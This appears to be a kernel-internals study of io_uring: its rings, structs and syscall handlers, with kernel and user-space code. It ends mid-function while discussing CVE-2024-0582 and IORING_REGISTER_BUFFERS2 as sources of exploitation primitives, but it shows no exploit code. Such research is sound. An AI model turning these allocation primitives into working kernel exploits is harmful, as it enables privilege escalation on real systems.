Basic structures

io_uring is organized around two single-direction ring queues: the Submission Queue (SQ) and the Completion Queue (CQ).

In the kernel, the io_uring struct holds the head and tail of a single ring: head is used for dequeueing, tail for enqueueing.

struct io_uring {
    u32 head;
    u32 tail;
};
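The head/tail pair turns a flat array into a ring: an index is the counter masked with (entries - 1), since ring sizes are powers of two. A minimal sketch of the idea (not kernel code; the names mirror the sq_ring_entries/sq_ring_mask fields shown later):

/* Minimal head/tail ring sketch; names are illustrative. */
struct ring {
    unsigned int head;      /* consumer side: advanced on dequeue */
    unsigned int tail;      /* producer side: advanced on enqueue */
    unsigned int mask;      /* entries - 1, entries is a power of 2 */
};

/* The slot touched next: the counters grow without bound and are
 * reduced to valid indices by masking. */
static inline unsigned int ring_slot(unsigned int counter, unsigned int mask)
{
    return counter & mask;
}

/* The ring is empty when head == tail, full when tail - head == entries. */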

The io_uring_sqe struct represents a submitted request (Submission Queue Entry).

/*
 * IO submission data structure (Submission Queue Entry)
 */
struct io_uring_sqe {
    __u8 opcode; /* type of operation for this sqe */
    __u8 flags; /* IOSQE_ flags */
    __u16 ioprio; /* ioprio for the request */
    __s32 fd; /* file descriptor to do IO on */
    union {
        __u64 off; /* offset into file */
        __u64 addr2;
        struct {
            __u32 cmd_op;
            __u32 __pad1;
        };
    };
    union {
        __u64 addr; /* pointer to buffer or iovecs */
        __u64 splice_off_in;
        struct {
            __u32 level;
            __u32 optname;
        };
    };
    __u32 len; /* buffer size or number of iovecs */
    union {
        __u32 rw_flags;
        __u32 fsync_flags;
        __u16 poll_events; /* compatibility */
        __u32 poll32_events; /* word-reversed for BE */
        __u32 sync_range_flags;
        __u32 msg_flags;
        __u32 timeout_flags;
        __u32 accept_flags;
        __u32 cancel_flags;
        __u32 open_flags;
        __u32 statx_flags;
        __u32 fadvise_advice;
        __u32 splice_flags;
        __u32 rename_flags;
        __u32 unlink_flags;
        __u32 hardlink_flags;
        __u32 xattr_flags;
        __u32 msg_ring_flags;
        __u32 uring_cmd_flags;
        __u32 waitid_flags;
        __u32 futex_flags;
        __u32 install_fd_flags;
        __u32 nop_flags;
        __u32 pipe_flags;
    };
    __u64 user_data; /* data to be passed back at completion time */
    /* pack this to avoid bogus arm OABI complaints */
    union {
        /* index into fixed buffers, if used */
        __u16 buf_index;
        /* for grouped buffer selection */
        __u16 buf_group;
    } __attribute__((packed));
    /* personality to use, if used */
    __u16 personality;
    union {
        __s32 splice_fd_in;
        __u32 file_index;
        __u32 zcrx_ifq_idx;
        __u32 optlen;
        struct {
            __u16 addr_len;
            __u16 __pad3[1];
        };
        struct {
            __u8 write_stream;
            __u8 __pad4[3];
        };
    };
    union {
        struct {
            __u64 addr3;
            __u64 __pad2[1];
        };
        struct {
            __u64 attr_ptr; /* pointer to attribute information */
            __u64 attr_type_mask; /* bit mask of attributes */
        };
        __u64 optval;
        /*
         * If the ring is initialized with IORING_SETUP_SQE128, then
         * this field is used for 80 bytes of arbitrary command data
         */
        __u8 cmd[0];
    };
};

The io_uring_cqe struct represents a completed request (Completion Queue Entry).

/*
 * IO completion data structure (Completion Queue Entry)
 */
struct io_uring_cqe {
    __u64 user_data; /* sqe->user_data value passed back */
    __s32 res; /* result code for this event */
    __u32 flags;

    /*
     * If the ring is initialized with IORING_SETUP_CQE32, then this field
     * contains 16-bytes of padding, doubling the size of the CQE.
     */
    __u64 big_cqe[];
};
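On the user side, draining the CQ means walking from a cached head up to the kernel-published tail, then storing the new head back. A minimal consumer sketch, assuming cq_head, cq_tail, cq_mask and cqes are pointers into the mmap'ed CQ ring (the names are illustrative):

/* CQ consumer sketch; pointers into the shared ring are assumed. */
unsigned int head = *cq_head;

/* Acquire load pairs with the kernel's release store of the tail. */
while (head != __atomic_load_n(cq_tail, __ATOMIC_ACQUIRE)) {
    struct io_uring_cqe *cqe = &cqes[head & *cq_mask];
    consume(cqe->user_data, cqe->res); /* hypothetical handler */
    head++;
}
/* Publish the new head so the kernel may reuse the slots. */
__atomic_store_n(cq_head, head, __ATOMIC_RELEASE);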

In practice the kernel keeps this data in the io_rings struct, which bundles the io_uring head/tail pairs for the submission queue (sq) and the completion queue (cq), plus the cqe array.

/*
 * This data is shared with the application through the mmap at offsets
 * IORING_OFF_SQ_RING and IORING_OFF_CQ_RING.
 *
 * The offsets to the member fields are published through struct
 * io_sqring_offsets when calling io_uring_setup.
 */
struct io_rings {
    /*
     * Head and tail offsets into the ring; the offsets need to be
     * masked to get valid indices.
     *
     * The kernel controls head of the sq ring and the tail of the cq ring,
     * and the application controls tail of the sq ring and the head of the
     * cq ring.
     */
    struct io_uring sq, cq;
    /*
     * Bitmasks to apply to head and tail offsets (constant, equals
     * ring_entries - 1)
     */
    u32 sq_ring_mask, cq_ring_mask;
    /* Ring sizes (constant, power of 2) */
    u32 sq_ring_entries, cq_ring_entries;
    /*
     * Number of invalid entries dropped by the kernel due to
     * invalid index stored in array
     *
     * Written by the kernel, shouldn't be modified by the
     * application (i.e. get number of "new events" by comparing to
     * cached value).
     *
     * After a new SQ head value was read by the application this
     * counter includes all submissions that were dropped reaching
     * the new SQ head (and possibly more).
     */
    u32 sq_dropped;
    /*
     * Runtime SQ flags
     *
     * Written by the kernel, shouldn't be modified by the
     * application.
     *
     * The application needs a full memory barrier before checking
     * for IORING_SQ_NEED_WAKEUP after updating the sq tail.
     */
    atomic_t sq_flags;
    /*
     * Runtime CQ flags
     *
     * Written by the application, shouldn't be modified by the
     * kernel.
     */
    u32 cq_flags;
    /*
     * Number of completion events lost because the queue was full;
     * this should be avoided by the application by making sure
     * there are not more requests pending than there is space in
     * the completion queue.
     *
     * Written by the kernel, shouldn't be modified by the
     * application (i.e. get number of "new events" by comparing to
     * cached value).
     *
     * As completion events come in out of order this counter is not
     * ordered with any other data.
     */
    u32 cq_overflow;
    /*
     * Ring buffer of completion events.
     *
     * The kernel writes completion events fresh every time they are
     * produced, so the application is allowed to modify pending
     * entries.
     */
    struct io_uring_cqe cqes[] ____cacheline_aligned_in_smp;
};

The io_rings struct, the io_uring_sqe array, and the other related data structures are in turn wrapped in the io_ring_ctx struct, the io_uring context.

struct io_ring_ctx {
    /* const or read-mostly hot data */
    struct {
        unsigned int flags;
        unsigned int drain_next: 1;
        unsigned int restricted: 1;
        unsigned int off_timeout_used: 1;
        unsigned int drain_active: 1;
        unsigned int has_evfd: 1;
        /* all CQEs should be posted only by the submitter task */
        unsigned int task_complete: 1;
        unsigned int lockless_cq: 1;
        unsigned int syscall_iopoll: 1;
        unsigned int poll_activated: 1;
        unsigned int drain_disabled: 1;
        unsigned int compat: 1;
        unsigned int iowq_limits_set : 1;

        struct task_struct *submitter_task;
        struct io_rings *rings;
        struct percpu_ref refs;

        clockid_t clockid;
        enum tk_offsets clock_offset;

        enum task_work_notify_mode notify_method;
        unsigned sq_thread_idle;
    } ____cacheline_aligned_in_smp;

    /* submission data */
    struct {
        struct mutex uring_lock;

        /*
         * Ring buffer of indices into array of io_uring_sqe, which is
         * mmapped by the application using the IORING_OFF_SQES offset.
         *
         * This indirection could e.g. be used to assign fixed
         * io_uring_sqe entries to operations and only submit them to
         * the queue when needed.
         *
         * The kernel modifies neither the indices array nor the entries
         * array.
         */
        u32 *sq_array;
        struct io_uring_sqe *sq_sqes;
        unsigned cached_sq_head;
        unsigned sq_entries;

        /*
         * Fixed resources fast path, should be accessed only under
         * uring_lock, and updated through io_uring_register(2)
         */
        atomic_t cancel_seq;

        /*
         * ->iopoll_list is protected by the ctx->uring_lock for
         * io_uring instances that don't use IORING_SETUP_SQPOLL.
         * For SQPOLL, only the single threaded io_sq_thread() will
         * manipulate the list, hence no extra locking is needed there.
         */
        bool poll_multi_queue;
        struct io_wq_work_list iopoll_list;

        struct io_file_table file_table;
        struct io_rsrc_data buf_table;
        struct io_alloc_cache node_cache;
        struct io_alloc_cache imu_cache;

        struct io_submit_state submit_state;

        /*
         * Modifications are protected by ->uring_lock and ->mmap_lock.
         * The flags, buf_pages and buf_nr_pages fields should be stable
         * once published.
         */
        struct xarray io_bl_xa;

        struct io_hash_table cancel_table;
        struct io_alloc_cache apoll_cache;
        struct io_alloc_cache netmsg_cache;
        struct io_alloc_cache rw_cache;
        struct io_alloc_cache cmd_cache;

        /*
         * Any cancelable uring_cmd is added to this list in
         * ->uring_cmd() by io_uring_cmd_insert_cancelable()
         */
        struct hlist_head cancelable_uring_cmd;
        /*
         * For Hybrid IOPOLL, runtime in hybrid polling, without
         * scheduling time
         */
        u64 hybrid_poll_time;
    } ____cacheline_aligned_in_smp;
    ...
};

Basic flow

The basic io_uring flow is as follows (did the a3 blog mix these up?):

  • The SQ holds user-submitted SQEs; the user maintains SQ::Tail
  • The kernel reads SQEs from the SQ; the kernel maintains SQ::Head
  • When the kernel completes a request it packs the result into a CQE and places it on the CQ; the kernel maintains CQ::Tail
  • The user reads the CQ to learn of completions; the user maintains CQ::Head

All of these updates go through shared memory; the whole flow follows an asynchronous, non-blocking, polling design.
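The submission side of that flow, seen from user space, is the mirror image of CQ consumption: fill an SQE, publish its index, then bump the tail with a release store so the kernel sees a fully written entry. A rough sketch, assuming sq_tail, sq_mask, sq_array and sqes point into the mmap'ed SQ ring:

/* User-side submit sketch; pointer names are illustrative. */
unsigned int tail = *sq_tail;
unsigned int idx  = tail & *sq_mask;

sqes[idx].opcode    = IORING_OP_NOP;  /* fill in the request */
sqes[idx].user_data = 0x1337;         /* echoed back in the CQE */
sq_array[idx] = idx;                  /* index into the SQE array */

/* Release store: the kernel must not see the new tail before the SQE. */
__atomic_store_n(sq_tail, tail + 1, __ATOMIC_RELEASE);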

io_uring-related system calls

The io_uring architecture introduces three system calls (a minimal usage sketch follows the list):

  • io_uring_setup(): creates an io_uring context, mainly the SQ and CQ rings with the requested number of entries, and returns a file descriptor used for all further operations
  • io_uring_register(): manages the files or user buffers used for async I/O; the main operations are register (create new buffers in the kernel), update (replace buffer contents), and unregister (free buffers); a registered buffer cannot be resized
  • io_uring_enter(): submits new I/O requests, optionally waiting for completion
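Since glibc does not wrap these calls, a bare-bones usage sketch goes through syscall(2) directly (ring mmap and SQE setup are omitted, so this only shows the call shapes):

#include <linux/io_uring.h>
#include <string.h>
#include <sys/syscall.h>
#include <unistd.h>

int main(void)
{
    struct io_uring_params p;
    memset(&p, 0, sizeof(p));

    /* Create SQ/CQ rings with 32 entries; returns the ring fd. */
    int ring_fd = syscall(__NR_io_uring_setup, 32, &p);

    /* A real program would mmap the rings and queue SQEs here;
     * io_uring_register() would pre-register buffers or files. */

    /* Submit up to 1 SQE and wait for at least 1 completion. */
    syscall(__NR_io_uring_enter, ring_fd, 1, 1,
            IORING_ENTER_GETEVENTS, NULL, 0);

    close(ring_fd);
    return 0;
}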

io_uring_setup()

The core handler is io_uring_create():

static __cold int io_uring_create(unsigned entries, struct io_uring_params *p,
                                  struct io_uring_params __user *params)
{
    struct io_ring_ctx *ctx;
    struct io_uring_task *tctx;
    struct file *file;
    int ret;

    ret = io_uring_sanitise_params(p);
    if (ret)
        return ret;

    ret = io_uring_fill_params(entries, p);
    if (unlikely(ret))
        return ret;

    ctx = io_ring_ctx_alloc(p); // allocate io_ring_ctx (kzalloc, GFP_KERNEL)
    if (!ctx)
        return -ENOMEM;

    ctx->clockid = CLOCK_MONOTONIC;
    ctx->clock_offset = 0;

    if (!(ctx->flags & IORING_SETUP_NO_SQARRAY))
        static_branch_inc(&io_key_has_sqarray);

    if ((ctx->flags & IORING_SETUP_DEFER_TASKRUN) &&
        !(ctx->flags & IORING_SETUP_IOPOLL) &&
        !(ctx->flags & IORING_SETUP_SQPOLL))
        ctx->task_complete = true;

    if (ctx->task_complete || (ctx->flags & IORING_SETUP_IOPOLL))
        ctx->lockless_cq = true;

    /*
     * lazy poll_wq activation relies on ->task_complete for synchronisation
     * purposes, see io_activate_pollwq()
     */
    if (!ctx->task_complete)
        ctx->poll_activated = true;

    /*
     * When SETUP_IOPOLL and SETUP_SQPOLL are both enabled, user
     * space applications don't need to do io completion events
     * polling again, they can rely on io_sq_thread to do polling
     * work, which can reduce cpu usage and uring_lock contention.
     */
    if (ctx->flags & IORING_SETUP_IOPOLL &&
        !(ctx->flags & IORING_SETUP_SQPOLL))
        ctx->syscall_iopoll = 1;

    ctx->compat = in_compat_syscall();
    if (!ns_capable_noaudit(&init_user_ns, CAP_IPC_LOCK))
        ctx->user = get_uid(current_user());

    /*
     * For SQPOLL, we just need a wakeup, always. For !SQPOLL, if
     * COOP_TASKRUN is set, then IPIs are never needed by the app.
     */
    if (ctx->flags & (IORING_SETUP_SQPOLL|IORING_SETUP_COOP_TASKRUN))
        ctx->notify_method = TWA_SIGNAL_NO_IPI;
    else
        ctx->notify_method = TWA_SIGNAL;

    /*
     * This is just grabbed for accounting purposes. When a process exits,
     * the mm is exited and dropped before the files, hence we need to hang
     * on to this mm purely for the purposes of being able to unaccount
     * memory (locked/pinned vm). It's not used for anything else.
     */
    mmgrab(current->mm);
    ctx->mm_account = current->mm;

    ret = io_allocate_scq_urings(ctx, p); // allocate io_rings and its pages; lots of memory allocation here
    if (ret)
        goto err;

    if (!(p->flags & IORING_SETUP_NO_SQARRAY))
        p->sq_off.array = (char *)ctx->sq_array - (char *)ctx->rings;

    ret = io_sq_offload_create(ctx, p); // set up the SQ side, mainly the WQ and SQPOLL pieces
    if (ret)
        goto err;

    p->features = IORING_FEAT_SINGLE_MMAP | IORING_FEAT_NODROP |
            IORING_FEAT_SUBMIT_STABLE | IORING_FEAT_RW_CUR_POS |
            IORING_FEAT_CUR_PERSONALITY | IORING_FEAT_FAST_POLL |
            IORING_FEAT_POLL_32BITS | IORING_FEAT_SQPOLL_NONFIXED |
            IORING_FEAT_EXT_ARG | IORING_FEAT_NATIVE_WORKERS |
            IORING_FEAT_RSRC_TAGS | IORING_FEAT_CQE_SKIP |
            IORING_FEAT_LINKED_FILE | IORING_FEAT_REG_REG_RING |
            IORING_FEAT_RECVSEND_BUNDLE | IORING_FEAT_MIN_TIMEOUT |
            IORING_FEAT_RW_ATTR | IORING_FEAT_NO_IOWAIT;

    if (copy_to_user(params, p, sizeof(*p))) {
        ret = -EFAULT;
        goto err;
    }

    if (ctx->flags & IORING_SETUP_SINGLE_ISSUER
        && !(ctx->flags & IORING_SETUP_R_DISABLED))
        WRITE_ONCE(ctx->submitter_task, get_task_struct(current));

    file = io_uring_get_file(ctx); // get the backing file
    if (IS_ERR(file)) {
        ret = PTR_ERR(file);
        goto err;
    }

    ret = __io_uring_add_tctx_node(ctx); // allocate the per-task io_uring context
    if (ret)
        goto err_fput;
    tctx = current->io_uring;

    /*
     * Install ring fd as the very last thing, so we don't risk someone
     * having closed it before we finish setup
     */
    if (p->flags & IORING_SETUP_REGISTERED_FD_ONLY)
        ret = io_ring_add_registered_file(tctx, file, 0, IO_RINGFD_REG_MAX);
    else
        ret = io_uring_install_fd(file);
    if (ret < 0)
        goto err_fput;

    trace_io_uring_create(ret, ctx, p->sq_entries, p->cq_entries, p->flags);
    return ret;
err:
    io_ring_ctx_wait_and_kill(ctx);
    return ret;
err_fput:
    fput(file);
    return ret;
}

io_allocate_scq_urings() performs a number of allocations, mainly:

  • kvmalloc_array() allocates a page-pointer array (GFP_KERNEL_ACCOUNT | __GFP_ZERO)
  • io_mem_alloc_compound() tries alloc_pages() first: round the size up to an order, grab all the pages as one compound allocation, then fill in the pointer array
  • failing that, alloc_pages_bulk_node() allocates the pages (roughly, filling the whole page array page by page; I have not dug into its internals)
static int io_region_allocate_pages(struct io_ring_ctx *ctx,
                                    struct io_mapped_region *mr,
                                    struct io_uring_region_desc *reg,
                                    unsigned long mmap_offset)
{
    gfp_t gfp = GFP_KERNEL_ACCOUNT | __GFP_ZERO | __GFP_NOWARN;
    size_t size = (size_t) mr->nr_pages << PAGE_SHIFT;
    unsigned long nr_allocated;
    struct page **pages;
    void *p;

    pages = kvmalloc_array(mr->nr_pages, sizeof(*pages), gfp);
    if (!pages)
        return -ENOMEM;

    p = io_mem_alloc_compound(pages, mr->nr_pages, size, gfp);
    if (!IS_ERR(p)) {
        mr->flags |= IO_REGION_F_SINGLE_REF;
        goto done;
    }

    nr_allocated = alloc_pages_bulk_node(gfp, NUMA_NO_NODE,
                                         mr->nr_pages, pages);
    if (nr_allocated != mr->nr_pages) {
        if (nr_allocated)
            release_pages(pages, nr_allocated);
        kvfree(pages);
        return -ENOMEM;
    }
done:
    reg->mmap_offset = mmap_offset;
    mr->pages = pages;
    return 0;
}

int io_create_region(struct io_ring_ctx *ctx, struct io_mapped_region *mr,
                     struct io_uring_region_desc *reg,
                     unsigned long mmap_offset)
{
    int nr_pages, ret;
    u64 end;

    if (WARN_ON_ONCE(mr->pages || mr->ptr || mr->nr_pages))
        return -EFAULT;
    if (memchr_inv(&reg->__resv, 0, sizeof(reg->__resv)))
        return -EINVAL;
    if (reg->flags & ~IORING_MEM_REGION_TYPE_USER)
        return -EINVAL;
    /* user_addr should be set IFF it's a user memory backed region */
    if ((reg->flags & IORING_MEM_REGION_TYPE_USER) != !!reg->user_addr)
        return -EFAULT;
    if (!reg->size || reg->mmap_offset || reg->id)
        return -EINVAL;
    if ((reg->size >> PAGE_SHIFT) > INT_MAX)
        return -E2BIG;
    if ((reg->user_addr | reg->size) & ~PAGE_MASK)
        return -EINVAL;
    if (check_add_overflow(reg->user_addr, reg->size, &end))
        return -EOVERFLOW;

    nr_pages = reg->size >> PAGE_SHIFT;
    if (ctx->user) {
        ret = __io_account_mem(ctx->user, nr_pages);
        if (ret)
            return ret;
    }
    mr->nr_pages = nr_pages;

    if (reg->flags & IORING_MEM_REGION_TYPE_USER)
        ret = io_region_pin_pages(ctx, mr, reg); // pages allocated by the user application, directly usable by the kernel
    else
        ret = io_region_allocate_pages(ctx, mr, reg, mmap_offset); // pages provided by the kernel
    if (ret)
        goto out_free;

    ret = io_region_init_ptr(mr);
    if (ret)
        goto out_free;
    return 0;
out_free:
    io_free_region(ctx, mr);
    return ret;
}


static __cold int io_allocate_scq_urings(struct io_ring_ctx *ctx,
                                         struct io_uring_params *p)
{
    struct io_uring_region_desc rd;
    struct io_rings *rings;
    size_t size, sq_array_offset;
    int ret;

    /* make sure these are sane, as we already accounted them */
    ctx->sq_entries = p->sq_entries;
    ctx->cq_entries = p->cq_entries;

    size = rings_size(ctx->flags, p->sq_entries, p->cq_entries,
                      &sq_array_offset);
    if (size == SIZE_MAX)
        return -EOVERFLOW;

    memset(&rd, 0, sizeof(rd));
    rd.size = PAGE_ALIGN(size);
    if (ctx->flags & IORING_SETUP_NO_MMAP) {
        rd.user_addr = p->cq_off.user_addr;
        rd.flags |= IORING_MEM_REGION_TYPE_USER;
    }
    ret = io_create_region(ctx, &ctx->ring_region, &rd, IORING_OFF_CQ_RING);
    if (ret)
        return ret;
    ctx->rings = rings = io_region_get_ptr(&ctx->ring_region);

    if (!(ctx->flags & IORING_SETUP_NO_SQARRAY))
        ctx->sq_array = (u32 *)((char *)rings + sq_array_offset);
    rings->sq_ring_mask = p->sq_entries - 1;
    rings->cq_ring_mask = p->cq_entries - 1;
    rings->sq_ring_entries = p->sq_entries;
    rings->cq_ring_entries = p->cq_entries;

    if (p->flags & IORING_SETUP_SQE128)
        size = array_size(2 * sizeof(struct io_uring_sqe), p->sq_entries);
    else
        size = array_size(sizeof(struct io_uring_sqe), p->sq_entries);
    if (size == SIZE_MAX) {
        io_rings_free(ctx);
        return -EOVERFLOW;
    }

    memset(&rd, 0, sizeof(rd));
    rd.size = PAGE_ALIGN(size);
    if (ctx->flags & IORING_SETUP_NO_MMAP) {
        rd.user_addr = p->sq_off.user_addr;
        rd.flags |= IORING_MEM_REGION_TYPE_USER;
    }
    ret = io_create_region(ctx, &ctx->sq_region, &rd, IORING_OFF_SQES);
    if (ret) {
        io_rings_free(ctx);
        return ret;
    }
    ctx->sq_sqes = io_region_get_ptr(&ctx->sq_region);
    return 0;
}
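The user-space counterpart of these regions is the mmap step: after io_uring_setup() returns, the application maps them at the fixed offsets named in the comments above. A rough sketch of a fragment, assuming p is the io_uring_params filled in by io_uring_setup(), ring_fd is the returned descriptor, and the kernel advertised IORING_FEAT_SINGLE_MMAP (so SQ and CQ ring metadata share one mapping):

/* Map ring metadata and the SQE array (needs <sys/mman.h>). */
size_t ring_sz = p.sq_off.array + p.sq_entries * sizeof(__u32);
size_t sqes_sz = p.sq_entries * sizeof(struct io_uring_sqe);

void *ring = mmap(NULL, ring_sz, PROT_READ | PROT_WRITE,
                  MAP_SHARED | MAP_POPULATE, ring_fd,
                  IORING_OFF_SQ_RING);
struct io_uring_sqe *sqes = mmap(NULL, sqes_sz, PROT_READ | PROT_WRITE,
                                 MAP_SHARED | MAP_POPULATE, ring_fd,
                                 IORING_OFF_SQES);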

io_uring_register()

The syscall is defined as follows and calls __io_uring_register().

SYSCALL_DEFINE4(io_uring_register, unsigned int, fd, unsigned int, opcode,
                void __user *, arg, unsigned int, nr_args)
{
    struct io_ring_ctx *ctx;
    long ret = -EBADF;
    struct file *file;
    bool use_registered_ring;

    use_registered_ring = !!(opcode & IORING_REGISTER_USE_REGISTERED_RING);
    opcode &= ~IORING_REGISTER_USE_REGISTERED_RING;

    if (opcode >= IORING_REGISTER_LAST)
        return -EINVAL;

    if (fd == -1)
        return io_uring_register_blind(opcode, arg, nr_args);

    file = io_uring_register_get_file(fd, use_registered_ring);
    if (IS_ERR(file))
        return PTR_ERR(file);
    ctx = file->private_data;

    mutex_lock(&ctx->uring_lock);
    ret = __io_uring_register(ctx, opcode, arg, nr_args);

    trace_io_uring_register(ctx, opcode, ctx->file_table.data.nr,
                            ctx->buf_table.nr, ret);
    mutex_unlock(&ctx->uring_lock);

    fput(file);
    return ret;
}

__io_uring_register() looks like this; it dispatches on opcode to the various operations on the io_uring instance:

static int __io_uring_register(struct io_ring_ctx *ctx, unsigned opcode,
                               void __user *arg, unsigned nr_args)
    __releases(ctx->uring_lock)
    __acquires(ctx->uring_lock)
{
    int ret;

    /*
     * We don't quiesce the refs for register anymore and so it can't be
     * dying as we're holding a file ref here.
     */
    if (WARN_ON_ONCE(percpu_ref_is_dying(&ctx->refs)))
        return -ENXIO;

    if (ctx->submitter_task && ctx->submitter_task != current)
        return -EEXIST;

    if (ctx->restricted) {
        opcode = array_index_nospec(opcode, IORING_REGISTER_LAST);
        if (!test_bit(opcode, ctx->restrictions.register_op))
            return -EACCES;
    }

    switch (opcode) {
    case IORING_REGISTER_BUFFERS:
        ret = -EFAULT;
        if (!arg)
            break;
        ret = io_sqe_buffers_register(ctx, arg, nr_args, NULL);
        break;
    case IORING_UNREGISTER_BUFFERS:
        ret = -EINVAL;
        if (arg || nr_args)
            break;
        ret = io_sqe_buffers_unregister(ctx);
        break;
    case IORING_REGISTER_FILES:
        ret = -EFAULT;
        if (!arg)
            break;
        ret = io_sqe_files_register(ctx, arg, nr_args, NULL);
        break;
    ...

io_uring_enter()

A user-space process calls io_uring_enter() to submit new I/O requests (telling the kernel that SQEs have been placed on the SQ), optionally choosing to wait for completions; the kernel then processes them.

SYSCALL_DEFINE6(io_uring_enter, unsigned int, fd, u32, to_submit,
                u32, min_complete, u32, flags, const void __user *, argp,
                size_t, argsz)
{
    struct io_ring_ctx *ctx;
    struct file *file;
    long ret;

    if (unlikely(flags & ~(IORING_ENTER_GETEVENTS | IORING_ENTER_SQ_WAKEUP |
                           IORING_ENTER_SQ_WAIT | IORING_ENTER_EXT_ARG |
                           IORING_ENTER_REGISTERED_RING |
                           IORING_ENTER_ABS_TIMER |
                           IORING_ENTER_EXT_ARG_REG |
                           IORING_ENTER_NO_IOWAIT)))
        return -EINVAL;

    /*
     * Ring fd has been registered via IORING_REGISTER_RING_FDS, we
     * need only dereference our task private array to find it.
     */
    if (flags & IORING_ENTER_REGISTERED_RING) {
        struct io_uring_task *tctx = current->io_uring;

        if (unlikely(!tctx || fd >= IO_RINGFD_REG_MAX))
            return -EINVAL;
        fd = array_index_nospec(fd, IO_RINGFD_REG_MAX);
        file = tctx->registered_rings[fd];
        if (unlikely(!file))
            return -EBADF;
    } else {
        file = fget(fd);
        if (unlikely(!file))
            return -EBADF;
        ret = -EOPNOTSUPP;
        if (unlikely(!io_is_uring_fops(file)))
            goto out;
    }

    ctx = file->private_data;
    ret = -EBADFD;
    if (unlikely(ctx->flags & IORING_SETUP_R_DISABLED))
        goto out;

    /*
     * For SQ polling, the thread will do all submissions and completions.
     * Just return the requested submit count, and wake the thread if
     * we were asked to.
     */
    ret = 0;
    if (ctx->flags & IORING_SETUP_SQPOLL) {
        if (unlikely(ctx->sq_data->thread == NULL)) {
            ret = -EOWNERDEAD;
            goto out;
        }
        if (flags & IORING_ENTER_SQ_WAKEUP)
            wake_up(&ctx->sq_data->wait);
        if (flags & IORING_ENTER_SQ_WAIT)
            io_sqpoll_wait_sq(ctx);

        ret = to_submit;
    } else if (to_submit) {
        ret = io_uring_add_tctx_node(ctx);
        if (unlikely(ret))
            goto out;

        mutex_lock(&ctx->uring_lock);
        ret = io_submit_sqes(ctx, to_submit);
        if (ret != to_submit) {
            mutex_unlock(&ctx->uring_lock);
            goto out;
        }
        if (flags & IORING_ENTER_GETEVENTS) {
            if (ctx->syscall_iopoll)
                goto iopoll_locked;
            /*
             * Ignore errors, we'll soon call io_cqring_wait() and
             * it should handle ownership problems if any.
             */
            if (ctx->flags & IORING_SETUP_DEFER_TASKRUN)
                (void)io_run_local_work_locked(ctx, min_complete);
        }
        mutex_unlock(&ctx->uring_lock);
    }

    if (flags & IORING_ENTER_GETEVENTS) {
        // wait for completion events
        int ret2;

        if (ctx->syscall_iopoll) {
            /*
             * We disallow the app entering submit/complete with
             * polling, but we still need to lock the ring to
             * prevent racing with polled issue that got punted to
             * a workqueue.
             */
            mutex_lock(&ctx->uring_lock);
iopoll_locked:
            ret2 = io_validate_ext_arg(ctx, flags, argp, argsz);
            if (likely(!ret2))
                ret2 = io_iopoll_check(ctx, min_complete);
            mutex_unlock(&ctx->uring_lock);
        } else {
            struct ext_arg ext_arg = { .argsz = argsz };

            ret2 = io_get_ext_arg(ctx, flags, argp, &ext_arg);
            if (likely(!ret2))
                ret2 = io_cqring_wait(ctx, min_complete, flags,
                                      &ext_arg);
        }

        if (!ret) {
            ret = ret2;

            /*
             * EBADR indicates that one or more CQE were dropped.
             * Once the user has been informed we can clear the bit
             * as they are obviously ok with those drops.
             */
            if (unlikely(ret2 == -EBADR))
                clear_bit(IO_CHECK_CQ_DROPPED_BIT,
                          &ctx->check_cq);
        }
    }
out:
    if (!(flags & IORING_ENTER_REGISTERED_RING))
        fput(file);
    return ret;
}

IORING_REGISTER_PBUF_RING

A study of CVE-2024-0582

IORING_REGISTER_BUFFERS2

Once we have an io_uring context, the io_uring_register() syscall lets us allocate kernel memory and write data into it. Here we look at the IORING_REGISTER_BUFFERS2 opcode:

  • IORING_REGISTER_BUFFERS2: pre-registers multiple buffers with the kernel so later requests can use them directly, without repeatedly passing, allocating, and freeing them.
    The opcode's intended functionality is secondary for our purposes; what matters is that its internal implementation offers plenty of exploitation primitives.

Allocation (GFP_KERNEL_ACCOUNT)

When the opcode is IORING_REGISTER_BUFFERS2, the io_uring_register syscall runs io_register_rsrc(), which hands the arguments to io_sqe_buffers_register():

Note: since kernel 6.13, io_alloc_page_table() is no longer used for these page allocations.
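For orientation before diving into the kernel path, the user-space side of this opcode passes a struct io_uring_rsrc_register describing an iovec array plus optional tags. A rough invocation sketch (iovs, tags and nr_bufs are caller-provided; error handling omitted):

/* Register nr_bufs buffers via IORING_REGISTER_BUFFERS2. */
struct io_uring_rsrc_register rr;
memset(&rr, 0, sizeof(rr));
rr.nr   = nr_bufs;
rr.data = (__u64)(uintptr_t)iovs;  /* struct iovec array */
rr.tags = (__u64)(uintptr_t)tags;  /* one u64 tag per buffer */

/* nr_args carries sizeof(rr), matching io_register_rsrc()'s size check. */
syscall(__NR_io_uring_register, ring_fd,
        IORING_REGISTER_BUFFERS2, &rr, sizeof(rr));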

static __cold void **io_alloc_page_table(size_t size)
{
    unsigned i, nr_tables = DIV_ROUND_UP(size, PAGE_SIZE);
    size_t init_size = size;
    void **table;

    table = kcalloc(nr_tables, sizeof(*table), GFP_KERNEL_ACCOUNT);
    if (!table)
        return NULL;

    for (i = 0; i < nr_tables; i++) {
        unsigned int this_size = min_t(size_t, size, PAGE_SIZE);

        table[i] = kzalloc(this_size, GFP_KERNEL_ACCOUNT);
        if (!table[i]) {
            io_free_page_table(table, init_size);
            return NULL;
        }
        size -= this_size;
    }
    return table;
}

__cold static int io_rsrc_data_alloc(struct io_ring_ctx *ctx,
                                     rsrc_put_fn *do_put, u64 __user *utags,
                                     unsigned nr, struct io_rsrc_data **pdata)
{
    struct io_rsrc_data *data;
    int ret = -ENOMEM;
    unsigned i;

    data = kzalloc(sizeof(*data), GFP_KERNEL);
    if (!data)
        return -ENOMEM;
    data->tags = (u64 **)io_alloc_page_table(nr * sizeof(data->tags[0][0]));
    if (!data->tags) {
        kfree(data);
        return -ENOMEM;
    }

    data->nr = nr;
    data->ctx = ctx;
    data->do_put = do_put;
    if (utags) {
        ret = -EFAULT;
        for (i = 0; i < nr; i++) {
            u64 *tag_slot = io_get_tag_slot(data, i);

            if (copy_from_user(tag_slot, &utags[i],
                               sizeof(*tag_slot)))
                goto fail;
        }
    }

    atomic_set(&data->refs, 1);
    init_completion(&data->done);
    *pdata = data;
    return 0;
fail:
    io_rsrc_data_free(data);
    return ret;
}

int io_sqe_buffers_register(struct io_ring_ctx *ctx, void __user *arg,
                            unsigned int nr_args, u64 __user *tags)
{
    struct page *last_hpage = NULL;
    struct io_rsrc_data *data;
    int i, ret;
    struct iovec iov;

    BUILD_BUG_ON(IORING_MAX_REG_BUFFERS >= (1u << 16));

    if (ctx->user_bufs)
        return -EBUSY;
